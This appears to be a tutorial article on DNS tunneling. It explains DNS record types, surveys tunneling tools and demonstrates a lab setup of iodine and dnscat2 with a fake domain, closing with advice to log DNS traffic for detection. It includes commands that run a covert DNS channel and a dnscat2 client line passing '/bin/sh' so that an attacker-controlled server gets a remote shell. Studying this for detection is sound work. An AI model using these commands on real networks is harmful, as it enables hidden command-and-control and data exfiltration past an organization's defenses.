In this article, I will tell you how an innocent and simple data communication can be abused. This basic communication protocol actually serves a simple purpose. As can be understood from the subject, we are talking about DNS.
DNS tunneling is the result of the misuse of the DNS protocol. In the DNS tunneling, the information conveyed is made as if it is a domain name query and response, but in fact, a data is transferred from the system or inserted into the system.
1. Brief information about DNS Protocol
DNS is the protocol that converts human-readable domain names into IP addresses. It is one of the basic protocols used in Internet communication and therefore it is widely used. It consists of query and answer. Generally, an infrastructure has reliable DNS servers that redirect DNS queries to the respective Authoritative DNS server. These DNS servers are called Caching / Forwarding DNS servers and can be found in the service provider infrastructure or in organizations themselves. Gateways used by home users are also used as Forwarding DNS servers and generally forward DNS queries to the DNS servers specified in the configuration on them.
The use of the DNS protocol is actually clear. The requests made to a DNS server are as follows; The user sends a recursive query to the DNS server in the environment, the DNS server receives this query and checks if it is in the Forward Lookup Zone or Cache information. If it finds it, it gives the answer to the user, if not, it looks for answers on Root Hint servers or Forwarder addresses. If it cannot find it as a result of these efforts, it sends the message not found to the user.
DNS record types may vary depending on the information to be learned. More than 40 recording types are available. [1] The most used record types are as follows;
A : DNS host record, stores a hostname and its corresponding IPv4 address
AAAA : Stores a hostname and its corresponding IPv6 address.
CNAME : Can be used to alias a hostname to another hostname.
MX : Specifies an SMTP email server for the domain, used to route outgoing emails to an email server.
NS : Specifies that a DNS Zone is delegated to a specific Authoritative Name Server, and provides the address of the name server.
PTR : Allows a DNS resolver to provide an IP address and receive a hostname (reverse DNS lookup).
TXT : Typically carries machine-readable data such as opportunistic encryption, sender policy framework, DKIM, DMARC, etc.
SOA : Indicates the Authoritative Name Server for the current DNS zone, contact details for the domain administrator, serial number, TTL.
SRV : A service location record, like MX but for other communication protocols.
CERT : Stores encryption certificates such as PKIX, SPKI, PGP, and so on
A label may contain zero to 63 characters. The null label (length zero) is reserved for the root zone. [2] The full domain name cannot exceed the length of 253 characters in its textual representation. In the internal binary representation of the DNS the maximum length requires 255 octets of storage, as it also stores the length of the name.
In the label, letters, numbers are allowed, as well as the dash symbol (“-”). No other punctuation is permitted, including the underscore (“_”). Labels are not case-sensitive.
DNS protocol usually uses UDP 53 for communication. It can use TCP 53 for zone transfer or communications larger than 512 bytes.
2. How DNS Can Be Abused?
DNS Tunneling is a method of cyber attack that encodes the data of other programs or protocols in DNS queries and responses. Basically it can be considered of misuse of DNS protocol and it creates a hidden communication channel to bypass the security layers of the organization. It has been around for almost 20 years.
DNS tunneling concept was originally designed as a way to bypass captive portals but over time, it was used to cause more serious damage, such as data exfiltration or communication with C&C (command and control) servers by malwares. DNS tunneling has been used frequently in targeted attacks over the past few years.
Typically, DNS tunneling applications run in server-client architecture. It requires the compromised system to have network connectivity, as DNS tunneling requires access to an internal DNS server with network access. Attackers must also control a domain and a server that can act as an authoritative server in order to execute the server-side tunneling.
In general, The DNS tunneling payload is usually transported encoded. Tools differ according to the types of encoding they use during DNS tunneling. In this project, the domain t.tunneldomain.com will be used for tunneling tests. So the queries will be like; WW24GRT579BQBG1MLH6DA72GDXXSDVZ.t.tunneldomain.com.
DNS query comparison:
[3] Some popular DNS tunneling tools ready to use on the Internet are as follows;
2.1. IODINE
It runs on Linux, Mac OS X, FreeBSD, NetBSD, OpenBSD and Windows. The bandwidth is asymmetrical with limited upstream and up to 1 Mbit/s downstream. It can use the NULL type that allows the downstream data to be sent without encoding. Each DNS reply can contain over a kilobyte of compressed payload data. Iodine handles setting IP number on interfaces automatically, and up to 16 users can share one server at the same time. Packet size is automatically probed for maximum downstream throughput.
2.2. DNSCat
Dnscat2 can be used for C&C server communication. It can upload/download files or run a shell. It’s also encrypted. Client is written in C and Server is written in Ruby
2.3. Heyoka
Heyoka is a Proof of Concept of an exfiltration tool which uses spoofed DNS requests to create a bidirectional tunnel. It aims to achieve both performance and stealth. It is written in C. The tunnel is up to 60% faster compared to existing tools because of binary encoding.
2.4. OzymanDNS
It is used to setup an SSH tunnel over DNS or for file transfer. Requests are base32 encoded and responses are base64 encoded TXT records. It is written in Perl.
2.5. TCP-over-DNS
It has Windows, Linux, Solaris compatibility. It has a Java based server and a Java based client. Also It supports LZMA compression.
In this article, a demonstration environment will be set up using Iodine and DNSCat2 tools and the DNS queries made by these tools will be inspected.
3. Demonstration Setup
As mentioned before, the attacker must have a domain name and Authoritative DNS server under the control. In addition, It requires a compromised client system where the DNS tunneling client application will run and a DNS server that works as Caching / Forwarding DNS for this system. According to the above mentioned needs, the following components will be used in the above topology (Figure 1).
Attacker controlled DNS Server (Bind DNS)
Attacker controlled DNS Tunneling Server (Ubuntu)
Trusted Caching/Forwarding DNS Server (Bind DNS)
Compromised Client System which runs DNS Tunneling Client (Ubuntu)
3.1. Attacker Controlled Authoritative DNS Server
A fake domain name that is not used on the Internet was used in this project. This domain name, eko-project.com, has been defined on the Authoritative DNS server and Authoritative DNS server IP address was entered as the NS record.
The tunneling tool is usually not run on the same server as the authoritative DNS server, because in this case the application may need to listen on a different port for DNS traffic. For this reason, the Authoritative DNS server and the server where the tunneling tool is used are separated. A subdomain has been determined to redirect the traffic to the tunneling application and delegated to this server where the tunneling application is running for this domain on the Authoritative DNS server.
3.2. Trusted Caching/Forwarding DNS Server
As mentioned above, a fake domain name that is not used on the internet was used as a domain name in the demonstration environment. For this reason, queries were redirected to the relevant authoritative DNS server by statically defining a [4] forwarder zone for this domain name on Forwarding DNS.
3.3. IODINE Setup and Usage
[5] Iodine is an extremely easy tool to set up and use. The package is installed with the following command.
#sudo apt update
#sudo apt install iodine
To run the tool on the server side, the following command should be run. #sudo iodined -fcP password tunnel_ip tunneling_domain
It was run with the following parameters in demonstration environment. #sudo iodined -fcP aPassword 10.0.0.1 t.eko-project.com
On the client side, package installation is done with the same command. While running, the following command is used.
#sudo iodine –frP password dns_server_ip tunneling_domain
The following command was used during the demonstration.
#sudo iodine –frP aPassword 192.168.1.31 t.eko-project.com
The parameters used during the demonstration are explained below. -f: Iodine keeps running foreground
- c: Disable checking client IP
- -P: Authentication password
- -r: if not used, iodine will check the Iodined server is reachable or not. If its reachable, it forwards request directly without DNS relay.
- -m: Forcing maximum fragment size. If it’s not used, iodine will automatically probe the maximum fragment size.
- -M: Maximum length of upstream hostnames. Default is 255.
- -T: Query type.
- -I : Maximum interval between requests for keep-alives
Output of usage is shown below;
3.4. DNSCat2 Setup and Usage
[6] This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol. Server part is written in ruby , client part is written in C language.
In order to install the tool, the necessary packages must be installed as follows.
# sudo apt install ruby ruby-dev build-essential
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/server/
# gem install bundler
# sudo gem install bundler
# sudo bundle install
If there is another application using the udp 53 port, it should be closed or unbinded. In the demonstration environment, the systemd-resolve service has been turned off with the following command;
# sudo systemctl stop systemd-resolved.service
The following command is sufficient to run the server part of the tool;
# sudo ruby dnscat2.rb tunnel_domain_name
The following command was used in the demonstration;
# sudo ruby dnscat2.rb t.eko-project.com
Since the client part of the tool is written in C language, it is enough to download the tool using “git”. The client part is executed with the following commands;
# cd dnscat2/client/
# ./dnscat tunnel_domain_name
The following command was used in the demonstration. [7] With the — exec parameter in this command, it is aimed that the remote system can receive a shell from the local system.
# ./dnscat t.eko-project.com -–exec “/bin/sh”
In addition, the parameters shown below will be used during the demonstration.
-delay : Sets the maximum delay between packets.
-steady : Always wait for the delay before sending.
-type : Specify the record type. Default is TXT, CNAME, MX
Output of usage is shown below;
4. Conclusion
As you can see, DNS tunneling is extremely easy. This technique has also been used in sophisticated attacks in recent years. I recommend you to review the link below;
This situation requires a more detailed analysis of DNS queries made in the environment. However, DNS tunneling is difficult to detect because it is similar to ordinary DNS queries and has no specific pattern. Therefore, organizations need to log and examine their DNS traffic.
5. References
[1] RFC 1035, Domain Names — Implementation and Specification, P.Mockapetris, the Internet Society (November 1987)
[2] DNS: Types of DNS Records, DNS Servers and DNS Query Types
https://ns1.com/resources/dns-types-records-servers-and-queries#:~:text=The%20most%20common%20DNS%20record,and%20its%20corresponding%20IPv6%20addresshttp://www.tcpipguide.com/free/t_DNSLabelsNamesandSyntaxRules.htm
[3] Farnham, G. (2013), Detecting DNS Tunneling. SANS Institute Information Security Reading Room
[4] How to Create Forward Lookup Zones for Bind
[5] Iodine, https://github.com/yarrick/iodine
https://www.doyler.net/security-not-included/iodine-dns-tunneling
[6] DNSCat2, https://github.com/iagox86/dnscat2
https://www.hackingarticles.in/dnscat2-command-and-control-over-the-dns/
[7] Reverse shell with DNSCat2
https://www.blackhillsinfosec.com/powershell-dns-command-control-with-dnscat2-powershell/
